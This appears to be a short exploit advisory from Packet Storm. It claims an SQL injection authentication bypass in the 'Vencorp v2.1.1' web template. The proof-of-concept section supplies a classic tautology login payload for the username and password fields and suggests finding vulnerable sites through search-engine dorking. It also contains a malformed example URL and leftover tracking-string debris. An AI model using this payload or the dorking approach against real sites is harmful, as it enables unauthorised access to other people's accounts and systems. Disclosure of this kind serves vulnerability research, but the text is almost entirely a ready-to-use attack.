Vencorp version 2.1.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
1efa85ad70e114a1d0f8dac25bda7b473b55d33338cbdef57caf77c451658123====================================================================================================================================
| # Title : Vencorp v 2.1.1 Auth by Pass Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |
| # Vendor : https://themeforest.net/item/elegant-responsive-html5-w-animated-metro-slider/5440458?ref=Venmond |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] use payload : USer = 'or''='@gmail.com pass = 'or''='
[+] https://www/127.0.0.1/venmondcom/demo/vendroid/
Greetings to :=================================================
jericho * Larry W. Cashdollar *LiquidWorm * Hussin-X * D4NB4R |
===============================================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed